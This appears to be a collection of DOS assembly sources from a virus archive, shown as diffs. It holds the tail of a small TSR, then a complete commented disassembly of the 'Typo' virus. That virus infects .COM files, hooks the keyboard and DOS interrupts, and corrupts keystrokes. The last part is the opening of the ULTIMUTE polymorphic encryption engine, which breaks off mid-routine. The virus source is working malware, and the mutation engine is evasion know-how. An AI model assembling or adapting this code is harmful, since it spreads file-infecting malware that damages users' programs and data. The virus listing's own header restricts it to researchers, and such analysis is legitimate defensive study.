|
||||
ADM proc
|
||||
cmp ah,byte ptr cs:ADM_INT
|
||||
je ADM_WORK
|
||||
db 0eah
|
||||
INT2F_JUMP db 0,0,0b2h,89h
|
||||
ADM_WORK:
|
||||
cmp al,0
|
||||
jne ADM_WORK1
|
||||
mov al,0ffh
|
||||
IRET
|
||||
ADM_WORK1:
|
||||
push dx
|
||||
push ax
|
||||
mov dl,al
|
||||
mov ah,2
|
||||
int 21h
|
||||
pop ax
|
||||
pop dx
|
||||
IRET
|
||||
ADM endp
|
||||
|
||||
ADM_INT db 93h
|
||||
|
||||
REZIDENT:
|
||||
BEGIN:
|
||||
; Init interrupt vectors
|
||||
mov ax,352fh
|
||||
int 21h
|
||||
mov word ptr cs:INT2F_JUMP,bx
|
||||
mov word ptr cs:INT2F_JUMP+2,es
|
||||
mov al,2fh
|
||||
mov dx,offset ADM
|
||||
mov ah,25h
|
||||
int 21h
|
||||
mov ah,093h
|
||||
mov al,'*'
|
||||
int 2fh
|
||||
mov dx,offset REZIDENT
|
||||
int 27h
|
||||
SEG_A ends
|
||||
end start
|
|
@ -0,0 +1,433 @@
|
|||
page 65,132
|
||||
title The 'Typo' Virus
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º British Computer Virus Research Centre º
|
||||
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
|
||||
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
|
||||
; º º
|
||||
; º The 'Typo' Virus º
|
||||
; º Disassembled by Joe Hirst, October 1989 º
|
||||
; º º
|
||||
; º Copyright (c) Joe Hirst 1989. º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
VECTOR SEGMENT AT 0
|
||||
|
||||
; Interrupt vectors
|
||||
|
||||
ORG 58H
|
||||
BW0058 DW ? ; Interrupt 16H offset
|
||||
BW005A DW ? ; Interrupt 16H segment
|
||||
ORG 80H
|
||||
BW0080 DW ? ; Interrupt 20H offset
|
||||
BW0082 DW ? ; Interrupt 20H segment
|
||||
BW0084 DW ? ; Interrupt 21H offset
|
||||
BW0086 DW ? ; Interrupt 21H segment
|
||||
|
||||
VECTOR ENDS
|
||||
|
||||
RAM SEGMENT AT 400H
|
||||
|
||||
; System data
|
||||
|
||||
ORG 6CH
|
||||
BW046C DW ? ; System clock
|
||||
|
||||
RAM ENDS
|
||||
|
||||
HOST SEGMENT AT 0
|
||||
|
||||
ORG 2CH
|
||||
DW002C DW ?
|
||||
ORG 0D0H
|
||||
DW00D0 EQU THIS WORD
|
||||
DB00D0 DB ?
|
||||
ORG 100H
|
||||
DB0100 DB ?
|
||||
DW0101 DW ?
|
||||
|
||||
HOST ENDS
|
||||
|
||||
CODE SEGMENT BYTE PUBLIC 'CODE'
|
||||
|
||||
ASSUME CS:CODE,DS:HOST
|
||||
|
||||
DB 'V1' ; Signature
|
||||
DB 0E9H, 1, 0 ; Jump for start of host
|
||||
DB '*.COM', 0 ; File spec for infection
|
||||
DB 0CEH, 0CDH, 20H ; File start read buffer
|
||||
DB 'V1' ; Signature test read buffer
|
||||
DW 5 ; File handle
|
||||
DB 0CDH, 20H, 90H ; Start of host
|
||||
DB 0
|
||||
DW 5AH ; Generation count
|
||||
DB 0
|
||||
|
||||
; Entry point
|
||||
|
||||
START: PUSH BX
|
||||
PUSH CX
|
||||
PUSH DX
|
||||
PUSH DS
|
||||
PUSH ES
|
||||
PUSH SI
|
||||
PUSH CS
|
||||
POP DS
|
||||
CALL BP0024 ; \ Get current address
|
||||
BP0024: POP SI ; /
|
||||
SUB SI,24H ; Relocate from start of virus
|
||||
DEC WORD PTR [SI+16H] ; Subtract from generation count
|
||||
CMP WORD PTR [SI+16H],3 ; Is generation count three?
|
||||
JNE BP0036 ; Branch if not
|
||||
MOV WORD PTR [SI+16H],005BH ; Reset generation count to 91
|
||||
BP0036: CALL BP02BE ; Test system for infection
|
||||
MOV DX,00D0H ; Temp default DTA
|
||||
MOV AH,1AH ; Set DTA function
|
||||
INT 21H ; DOS service
|
||||
MOV AL,[SI+0BH] ; \ Save start of host (1)
|
||||
MOV [SI+12H],AL ; /
|
||||
MOV AX,[SI+0CH] ; \ Save start of host (2)
|
||||
MOV [SI+13H],AX ; /
|
||||
MOV AH,2AH ; Get date function
|
||||
INT 21H ; DOS service
|
||||
TEST DL,1 ; First of month?
|
||||
JNZ BP0074 ; Branch if not
|
||||
MOV DX,SI ; \ Address '*.COM'
|
||||
ADD DX,5 ; /
|
||||
nop
|
||||
XOR CX,CX ; No attributes
|
||||
MOV AH,4EH ; Find first file function
|
||||
INT 21H ; DOS service
|
||||
JB BP0074 ; Branch if not found
|
||||
BP0063: CALL BP0092 ; Test for infection
|
||||
MOV DX,SI ; \ Address '*.COM'
|
||||
ADD DX,5 ; /
|
||||
nop
|
||||
XOR CX,CX ; No attributes
|
||||
MOV AH,4FH ; Find next file function
|
||||
INT 21H ; DOS service
|
||||
JNB BP0063 ; Branch if found
|
||||
BP0074: MOV AL,[SI+12H] ; \ Restore start of host (1)
|
||||
MOV DB0100,AL ; /
|
||||
MOV AX,[SI+13H] ; \ Restore start of host (2)
|
||||
MOV DW0101,AX ; /
|
||||
MOV DX,0080H ; Original default DTA
|
||||
MOV AH,1AH ; Set DTA function
|
||||
INT 21H ; DOS service
|
||||
POP SI
|
||||
POP ES
|
||||
POP DS
|
||||
POP DX
|
||||
POP CX
|
||||
POP BX
|
||||
MOV AX,0100H ; \ Branch to start of host
|
||||
JMP AX ; /
|
||||
|
||||
; Test for infection in COM file
|
||||
|
||||
BP0092: MOV AX,4301H ; Set file attributes function
|
||||
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
|
||||
XOR CX,CX ; No attributes
|
||||
INT 21H ; DOS service
|
||||
MOV AX,3D02H ; Open handle (R/W) function
|
||||
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
|
||||
INT 21H ; DOS service
|
||||
JNB BP00A9 ; Branch if no error
|
||||
JMP BP015D ; Return
|
||||
|
||||
BP00A9: MOV [SI+10H],AX ; Save file handle
|
||||
MOV BX,AX ; Move file handle
|
||||
MOV AH,3FH ; Read handle function
|
||||
MOV CX,3 ; Length to read
|
||||
MOV DX,SI ; \ Address start-of-host store
|
||||
ADD DX,000BH ; /
|
||||
nop
|
||||
INT 21H ; DOS service
|
||||
CMP BYTE PTR [SI+0BH],0E9H ; Is it a jump?
|
||||
JNE BP00F1 ; Branch if not
|
||||
MOV DX,[SI+0CH] ; \
|
||||
SUB DX,16H ; /
|
||||
XOR CX,CX ; No high offset
|
||||
MOV AX,4200H ; Move file pointer function
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
INT 21H ; DOS service
|
||||
MOV BX,AX ; Move actual offset (? not used)
|
||||
MOV AH,3FH ; Read handle function
|
||||
MOV CX,2 ; Length to read
|
||||
MOV DX,SI ; \ Address signature test buffer
|
||||
ADD DX,000EH ; /
|
||||
nop
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
INT 21H ; DOS service
|
||||
JB BP014A ; Branch if error
|
||||
CMP AX,0 ; Did we read anything?
|
||||
JE BP00F1 ; Branch if not
|
||||
MOV AX,[SI+0EH] ; Get signature test
|
||||
CMP AX,[SI] ; Is it signature?
|
||||
JE BP014A ; Branch if yes
|
||||
BP00F1: XOR CX,CX ; \ No offset
|
||||
XOR DX,DX ; /
|
||||
MOV AX,4202H ; Move file pointer function (EOF)
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
INT 21H ; DOS service
|
||||
JB BP014A ; Branch if error
|
||||
SUB AX,3 ; Convert length to jump offset
|
||||
MOV [SI+3],AX ; Store in jump
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
MOV AH,40H ; Write handle function
|
||||
MOV CX,OFFSET ENDADR ; Length of virus
|
||||
NOP
|
||||
MOV DX,SI ; \ Address start of virus
|
||||
ADD DX,0 ; /
|
||||
nop
|
||||
INT 21H ; DOS service
|
||||
JB BP014A ; Branch if error
|
||||
ADD WORD PTR [SI+3],19H ; Add entry point offset to jump offset
|
||||
XOR DX,DX ; \ No offset
|
||||
XOR CX,CX ; /
|
||||
MOV AX,4200H ; Move file pointer function
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
INT 21H ; DOS service
|
||||
JB BP014A ; Branch if error
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
MOV AH,40H ; Write handle function
|
||||
MOV CX,3 ; Length of jump
|
||||
MOV DX,SI ; \ Address initial jump
|
||||
ADD DX,2 ; /
|
||||
nop
|
||||
INT 21H ; DOS service
|
||||
MOV AX,5701H ; Set file date & time function
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
MOV CX,DW00D0+16H ; Get file time from DTA
|
||||
MOV DX,DW00D0+18H ; Get file date from DTA
|
||||
INT 21H ; DOS service
|
||||
BP014A: MOV BX,[SI+10H] ; Get file handle
|
||||
MOV AH,3EH ; Close handle function
|
||||
INT 21H ; DOS service
|
||||
MOV AX,4301H ; Set file attributes function
|
||||
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
|
||||
MOV CL,DB00D0+15H ; Get attributes from DTA
|
||||
INT 21H ; DOS service
|
||||
BP015D: RET
|
||||
|
||||
; Interrupt 16H routine
|
||||
|
||||
BP015E: STI
|
||||
CMP AH,0DDH ; Infection test function?
|
||||
JNE BP0167 ; Branch if not
|
||||
MOV AL,AH ; Copy function number
|
||||
IRET
|
||||
|
||||
BP0167: CMP AH,0 ; Get key token?
|
||||
JE BP01D8 ; Branch if yes
|
||||
DB 0EAH ; Far jump
|
||||
DW016D DW 0488H ; Int 16H offset
|
||||
DW016F DW 39D8H ; Int 16H segment
|
||||
|
||||
DW0171 DW 0FA76H
|
||||
DW0173 DW 0F9DCH
|
||||
DW0175 DW 005AH
|
||||
|
||||
DB0177 DB 060H, 031H, 032H, 033H, 034H, 035H, 036H, 037H
|
||||
DB 038H, 039H, 030H, 02DH, 03DH, 05CH, 07EH, 021H
|
||||
DB 040H, 023H, 024H, 025H, 05EH, 026H, 02AH, 028H
|
||||
DB 029H, 05FH, 02BH, 07CH, 071H, 077H, 065H, 072H
|
||||
DB 074H, 079H, 075H, 069H, 06FH, 070H, 05BH, 05DH
|
||||
DB 05BH, 061H, 073H, 064H, 066H, 067H, 068H, 06AH
|
||||
DB 06BH, 06CH, 03BH, 027H, 07AH, 078H, 063H, 076H
|
||||
DB 062H, 06EH, 06DH, 02CH, 02EH, 02FH, 051H, 057H
|
||||
DB 045H, 052H, 054H, 059H, 055H, 049H, 04FH, 050H
|
||||
DB 07BH, 07DH, 041H, 053H, 044H, 046H, 047H, 048H
|
||||
DB 04AH, 04BH, 04CH, 03AH, 022H, 03BH, 05AH, 058H
|
||||
DB 043H, 056H, 042H, 04EH, 04DH, 03CH, 03EH, 03FH
|
||||
DB 02EH
|
||||
|
||||
BP01D8: PUSH SI
|
||||
CALL BP01DC ; \ Get current address
|
||||
BP01DC: POP SI ; /
|
||||
PUSHF
|
||||
CALL DWORD PTR CS:[SI-6FH] ; Execute original BIOS call
|
||||
PUSH BX
|
||||
PUSH ES
|
||||
MOV BX,0040H ; \ Address system RAM
|
||||
MOV ES,BX ; /
|
||||
ASSUME ES:RAM
|
||||
MOV BX,BW046C ; Get system clock, low word
|
||||
PUSH BX
|
||||
SUB BX,CS:[SI-6BH] ; DW0171
|
||||
CMP BX,2
|
||||
POP BX
|
||||
MOV CS:[SI-6BH],BX
|
||||
JG BP0236
|
||||
XCHG BX,CS:[SI-69H] ; DW0173
|
||||
SUB BX,CS:[SI-69H]
|
||||
NEG BX
|
||||
CMP BX,CS:[SI-67H] ; DW0175
|
||||
JL BP0236
|
||||
DEC WORD PTR CS:[SI-67H]
|
||||
CMP WORD PTR CS:[SI-67H],6
|
||||
JE BP021E
|
||||
MOV WORD PTR CS:[SI-67H],005BH
|
||||
BP021E: SUB SI,65H
|
||||
PUSH CX
|
||||
MOV CX,0061H
|
||||
BP0225: CMP AL,CS:[SI]
|
||||
JE BP0231
|
||||
INC SI
|
||||
LOOP BP0225
|
||||
POP CX
|
||||
JMP BP0236
|
||||
|
||||
BP0231: POP CX
|
||||
MOV AL,CS:[SI+1]
|
||||
BP0236: POP ES
|
||||
POP BX
|
||||
POP SI
|
||||
RETF 2
|
||||
|
||||
; Interrupt 21H routine
|
||||
|
||||
ASSUME ES:NOTHING
|
||||
BP023C: CMP AH,0 ; Terminate program?
|
||||
JE BP0246 ; Branch if yes
|
||||
CMP AH,4CH ; Load?
|
||||
JNE BP025F ; Branch if not
|
||||
BP0246: CALL BP026D ; Install virus in memory
|
||||
MOV DX,CS:DW002C ; \ Set ES to environment block
|
||||
MOV ES,DX ; /
|
||||
MOV BX,0 ; Zero length
|
||||
MOV AH,4AH ; Set block function
|
||||
INT 21H ; DOS service
|
||||
MOV DX,001DH ; \ Length to keep
|
||||
ADD DX,1 ; /
|
||||
MOV AH,31H ; Keep process function
|
||||
BP025F: DB 0EAH ; Far jump
|
||||
DW0260 DW 2DEAH ; Int 21H offset
|
||||
DW0262 DW 4242H ; Int 21H segment
|
||||
|
||||
; Interrupt 20H routine
|
||||
|
||||
BP0264: MOV AX,4C00H ; Fake a load
|
||||
JMP BP023C ; Process as a DOS service
|
||||
|
||||
DW0269 DW 2C08H ; Int 20H offset
|
||||
DW026B DW 4242H ; Int 20H segment
|
||||
|
||||
; Install virus in memory
|
||||
|
||||
BP026D: PUSH CX
|
||||
PUSH DI
|
||||
PUSH SI
|
||||
PUSH ES
|
||||
CALL BP0274 ; \ Get current address
|
||||
BP0274: POP SI ; /
|
||||
PUSH SI
|
||||
MOV DI,0100H ; Address start of area
|
||||
MOV CX,OFFSET BP023C-BP015E ; Length to copy
|
||||
BP027C: MOV AL,CS:[SI+OFFSET BP015E-BP0274] ; Get a byte
|
||||
MOV CS:[DI],AL ; Store in new location
|
||||
INC SI ; Next input position
|
||||
INC DI ; Next output position
|
||||
LOOP BP027C ; Repeat to end of area
|
||||
POP SI
|
||||
XOR CX,CX ; \ Address zero
|
||||
MOV ES,CX ; /
|
||||
ASSUME ES:VECTOR
|
||||
MOV CX,CS:[SI-14H] ; \ Restore Int 21H offset
|
||||
MOV BW0084,CX ; /
|
||||
MOV CX,CS:[SI-12H] ; \ Restore Int 21H segment
|
||||
MOV BW0086,CX ; /
|
||||
MOV CX,CS:[SI-0BH] ; \ Restore Int 20H offset
|
||||
MOV BW0080,CX ; /
|
||||
MOV CX,CS:[SI-9] ; \ Restore Int 20H segment
|
||||
MOV BW0082,CX ; /
|
||||
MOV CX,0100H ; \ Install moved area as Int 16H
|
||||
MOV BW0058,CX ; /
|
||||
ASSUME ES:NOTHING
|
||||
POP ES
|
||||
POP SI
|
||||
POP DI
|
||||
POP CX
|
||||
RET
|
||||
|
||||
; Test system for infection
|
||||
|
||||
BP02BE: PUSH AX
|
||||
XOR AL,AL ; Clear register
|
||||
MOV AH,0DDH ; Infection test function
|
||||
INT 16H ; Keyboard I/O
|
||||
CMP AL,AH ; Are they the same
|
||||
JNE BP02CB ; Branch if not
|
||||
POP AX
|
||||
RET
|
||||
|
||||
; Install interrupts
|
||||
|
||||
BP02CB: PUSH BX
|
||||
PUSH SI
|
||||
PUSH ES
|
||||
MOV DX,[SI+16H] ; Get generation count
|
||||
CALL BP02D4 ; \ Get current address
|
||||
BP02D4: POP SI ; /
|
||||
PUSH BX
|
||||
PUSH ES
|
||||
MOV BX,0040H ; \ Address system RAM
|
||||
MOV ES,BX ; /
|
||||
ASSUME ES:RAM
|
||||
MOV BX,BW046C ; Get system clock, low word
|
||||
MOV CS:[SI+DW0171-BP02D4],BX ; Get system clock, low word
|
||||
MOV CS:[SI+DW0173-BP02D4],BX ; Get system clock, low word
|
||||
ASSUME ES:NOTHING
|
||||
POP ES
|
||||
POP BX
|
||||
MOV [SI+DW0175-BP02D4],DX ; Save generation count
|
||||
XOR AX,AX ; \ Address zero
|
||||
MOV ES,AX ; /
|
||||
ASSUME ES:VECTOR
|
||||
MOV AX,BW0084 ; \ Save Int 21H offset (DW0260)
|
||||
MOV CS:[SI-74H],AX ;
|
||||
MOV AX,BW0086 ; \ Save Int 21H segment (DW0262)
|
||||
MOV CS:[SI-72H],AX ;
|
||||
MOV AX,BW0058 ; \ Save Int 16H offset (DW016D)
|
||||
MOV CS:[SI+0FE99H],AX ; /
|
||||
MOV AX,BW005A ; \ Save Int 16H segment (DW016F)
|
||||
MOV CS:[SI+0FE9BH],AX ; /
|
||||
MOV AX,BW0080 ; \ Save Int 20H offset (DW0269)
|
||||
MOV CS:[SI-6BH],AX ; /
|
||||
MOV AX,BW0082 ; \ Save Int 20H segment (DW026B)
|
||||
MOV CS:[SI-69H],AX ; /
|
||||
CLI
|
||||
PUSH CS ; \ Set Int 21H segment
|
||||
POP BW0086 ; /
|
||||
MOV BW0084,SI ; \ Set Int 21H offset (BP023C)
|
||||
SUB BW0084,0098H ; /
|
||||
PUSH CS ; \ Set Int 20H segment
|
||||
POP BW0082 ; /
|
||||
MOV BW0080,SI ; \ Set Int 20H offset (BP0264)
|
||||
SUB BW0080,70H ; /
|
||||
PUSH CS ; \ Set Int 16H segment
|
||||
POP BW005A ; /
|
||||
MOV BW0058,SI ; \ Set Int 16H offset (BP015E)
|
||||
SUB BW0058,0176H ; /
|
||||
STI
|
||||
ASSUME ES:NOTHING
|
||||
POP ES
|
||||
POP SI
|
||||
POP BX
|
||||
POP AX
|
||||
RET
|
||||
|
||||
ENDADR EQU $
|
||||
|
||||
CODE ENDS
|
||||
|
||||
END
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
|
@ -0,0 +1,584 @@
|
|||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; The ULTImate MUTation Engine .93á (c) 1993 Black Wolf Enterprises
|
||||
; pardon the title, had to think of something... }-)
|
||||
;
|
||||
;ULTIMUTE is a mutation engine written for security-type applications and
|
||||
;other areas where mutation of executable code is necessary. For my personal
|
||||
;use, I have implemented it in Black Wolf's File Protection Utilities 2.1s,
|
||||
;using it to encrypt the code placed onto EXE's and COM's to protect them
|
||||
;from simple modification and/or unauthorized use. The encryption algorithms
|
||||
;themselves are terribly simple - the main point being that they change
|
||||
;each time and are difficult to trace through. This engine is written mainly
|
||||
;to keep a "hack one, hack 'em all" approach from working on protected code,
|
||||
;rather than to keep the code secure by a cryptologist's point of view.
|
||||
;
|
||||
;Including: Better Anti-Tracing abilities, 1017 byte size, Anti-Disassembling
|
||||
; code, largely variable size for decoder. Also includes variable
|
||||
; calling segmentation (i.e. CS<>ES<>DS, and can be called via
|
||||
; near call, far call, or interrupt, the last of which can be
|
||||
; useful as a memory-resident handler for multiple programs to
|
||||
; use).
|
||||
;
|
||||
;Note: Please - this program and it's source have been released as freeware,
|
||||
; but do NOT use the mutation engine in viruses! For one thing, the
|
||||
; decryptor sequence has several repetitive sequences that can be scanned
|
||||
; for, and for another, that just isn't what it was designed for and
|
||||
; I would NOT appreciate it. If you MUST use someone else's mutation
|
||||
; engine for such, use the TPE or MTE. I do NOT condone such, however.
|
||||
;
|
||||
;Any modifications made to this program should be listed below the solid line,
|
||||
;along with the name of the programmer and the date the file was changed.
|
||||
;Also - they should be commented where changed. If at all possible, report
|
||||
;modifications to file to the address listed in the documentation.
|
||||
;
|
||||
;DISCLAIMER: The author takes ABSOLUTELY NO RESPONSIBILITY for any damages
|
||||
;resulting from the use/misuse of this program. The user agrees to hold
|
||||
;the author harmless for any consequences that may occur directly or
|
||||
;indirectly from the use of this program by utilizing this program/file
|
||||
;in any manner. Please use the engine with care.
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
;Modifications:
|
||||
; None as of yet (original release version)
|
||||
|
||||
.model tiny
|
||||
.radix 16
|
||||
.code
|
||||
|
||||
public _ULTMUTE, _END_ULTMUTE, Get_Rand, Init_Rand
|
||||
|
||||
;Underscores are used so that these routines can be called from C and other
|
||||
;upper level languages. If you wish to use Get_Rand and Init_Rand in C, you
|
||||
;need to add underscores in their names as well. Also, the random number
|
||||
;generations may not be sound for all purposes. They do the job for this
|
||||
;program, but they may/may not be mathematically correct.
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
;ENTRY:
|
||||
; CX=Code Length BX=New_Entry_Point
|
||||
; DS:SI=Code AX=Calling Style
|
||||
; ES:DI=Destination 1=Near Call, 2=Far Call, 3=Int Call
|
||||
;
|
||||
;RETURN:
|
||||
; CX=New Size ES:DI = Same, now contains encrypted code
|
||||
; w/decryptor
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
_ULTMUTE:
|
||||
push bp ax bx cx dx es ds si di
|
||||
call Get_Our_Offset
|
||||
Offset_Mark:
|
||||
inc cx
|
||||
inc cx
|
||||
mov word ptr cs:[bp+1+Set_Size],cx
|
||||
mov word ptr cs:[Start_Pos+bp],bx
|
||||
call Init_Rand
|
||||
call Get_Base_Reg
|
||||
call Setup_Choices
|
||||
call Create_EncDec
|
||||
call Copy_Decrypt_Code
|
||||
call Encrypt_It
|
||||
Ending_ULTMUTE:
|
||||
pop di si ds es dx cx bx ax
|
||||
add cx,cs:[Decryptor_Length+bp]
|
||||
inc cx
|
||||
inc cx
|
||||
pop bp
|
||||
cmp ax,3 ;Select Returning method, i.e. retn, retf, iret
|
||||
je Int_Call
|
||||
cmp ax,2
|
||||
je Far_Call
|
||||
Near_Call:
|
||||
retn
|
||||
Far_Call:
|
||||
retf
|
||||
Int_Call:
|
||||
iret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Get_Our_Offset:
|
||||
mov bp,sp
|
||||
mov bp,ss:[bp] ;This trick finds our current offset
|
||||
sub bp,offset Offset_Mark ;from the compiling point, as it
|
||||
ret ;is usually not constant....
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Init_Rand:
|
||||
push ax ds
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov ax,ds:[46c] ;Get seed from timer click at
|
||||
pop ds ;0000:046c
|
||||
mov cs:[rand_seed+bp],ax
|
||||
pop ax
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Get_Rand:
|
||||
push cx dx
|
||||
mov ax,cs:[rand_seed+bp]
|
||||
mov cx,0deadh
|
||||
mul cx ;This probably isn't a good algorithm,
|
||||
xor ax,0dada ;(understatement) but it works for
|
||||
ror ax,1 ;our purposes in this application.
|
||||
mov cs:[rand_seed+bp],ax
|
||||
pop dx cx
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
rand_seed dw 0
|
||||
Base_Reg db 0
|
||||
Base_Pointer db 0
|
||||
Start_Pos dw 0
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Get_Base_Reg:
|
||||
call Get_Rand
|
||||
and ax,11b
|
||||
cmp al,1 ;Eliminate CX for loop purposes
|
||||
je Get_Base_Reg
|
||||
mov byte ptr cs:[bp+Base_Reg],al
|
||||
Do_Pointer_Reg:
|
||||
call Get_Rand
|
||||
shr al,1
|
||||
jc Done_Base_Reg
|
||||
mov byte ptr cs:[bp+Base_Pointer],0
|
||||
ret
|
||||
Done_Base_Reg:
|
||||
mov byte ptr cs:[bp+Base_Pointer],1
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Setup_Choices:
|
||||
push ds si
|
||||
push cs
|
||||
pop ds
|
||||
mov si,bp
|
||||
|
||||
call Get_Rand
|
||||
mov word ptr [si+Xor_It+2],ax ;Randomize Xor
|
||||
call Get_Rand
|
||||
mov word ptr [si+Dummy3+2],ax ;Randomize Add/Sub
|
||||
mov word ptr [si+Dummy7+2],ax
|
||||
|
||||
call Get_Rand ;Randomize Add/Sub
|
||||
mov word ptr [si+Dummy4+2],ax
|
||||
mov word ptr [si+Dummy8+2],ax
|
||||
|
||||
call Get_Rand
|
||||
mov byte ptr [si+Rand_Byte1],al ;Randomize Random bytes
|
||||
mov byte ptr [si+Rand_Byte2],ah
|
||||
call Get_Rand
|
||||
mov byte ptr [si+Rand_Byte3],al
|
||||
mov byte ptr [si+Rand_Byte4],ah
|
||||
call Get_Rand
|
||||
mov byte ptr [si+Rand_Byte5],al
|
||||
mov byte ptr [si+Rand_Byte6],ah
|
||||
call Get_Rand
|
||||
mov byte ptr [si+Rand_Byte7],al
|
||||
mov byte ptr [si+Rand_Byte8],ah
|
||||
call Get_Rand
|
||||
mov byte ptr [si+Rand_Byte9],al
|
||||
mov byte ptr [si+Rand_Byte10],ah
|
||||
|
||||
mov al,byte ptr [si+Base_Reg]
|
||||
Set_Switcher:
|
||||
and byte ptr [si+Switcher+1],0e6 ;Delete Register
|
||||
mov ah,al
|
||||
shl ah,1
|
||||
shl ah,1
|
||||
shl ah,1
|
||||
or byte ptr [Switcher+1+si],ah
|
||||
Set_Switcher_Pointer:
|
||||
push ax
|
||||
mov al,byte ptr [si+Base_Pointer]
|
||||
or byte ptr [si+Switcher+1],al
|
||||
Set_Set_Pointy:
|
||||
and byte ptr [si+Set_Pointy],0fe
|
||||
or byte ptr [si+Set_Pointy],al
|
||||
and byte ptr [si+Inc_Pointy],0fe
|
||||
or byte ptr [si+Inc_Pointy],al
|
||||
and byte ptr [si+Inc_Pointy+1],0fe
|
||||
or byte ptr [si+Inc_Pointy+1],al
|
||||
pop ax
|
||||
Set_Xorit:
|
||||
and byte ptr [si+Xor_It+1],0fc
|
||||
or byte ptr [si+Xor_It+1],al
|
||||
Set_Flip_It:
|
||||
